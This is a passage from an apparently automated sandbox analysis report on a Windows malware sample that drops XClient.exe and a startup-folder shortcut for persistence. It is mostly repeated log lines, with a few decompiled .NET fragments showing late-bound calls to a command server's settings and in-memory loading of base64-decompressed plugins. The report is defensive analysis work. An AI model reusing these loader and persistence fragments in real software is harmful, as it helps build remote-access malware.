                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: XClient.lnk.0.drLNK file: ..\..\..\..\..\XClient.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: NzEsfIiAc0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: NzEsfIiAc0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: NzEsfIiAc0.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: NzEsfIiAc0.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      .NET source code contains potential unpacker
                      Source: NzEsfIiAc0.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: NzEsfIiAc0.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: NzEsfIiAc0.exe, Messages.cs.Net Code: Memory
                      Source: XClient.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD34773891 pushad ; iretd 0_2_00007FFD34773981
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347705FA push ebx; retf 0_2_00007FFD3477060A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3468D2A5 pushad ; iretd 2_2_00007FFD3468D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34872316 push 8B485F91h; iretd 2_2_00007FFD3487231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3466D2A5 pushad ; iretd 5_2_00007FFD3466D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34852316 push 8B485F93h; iretd 5_2_00007FFD3485231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465D2A5 pushad ; iretd 10_2_00007FFD3465D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34842316 push 8B485F94h; iretd 10_2_00007FFD3484231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3466D2A5 pushad ; iretd 13_2_00007FFD3466D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478C2C5 push ebx; iretd 13_2_00007FFD3478C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34852316 push 8B485F93h; iretd 13_2_00007FFD3485231B
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
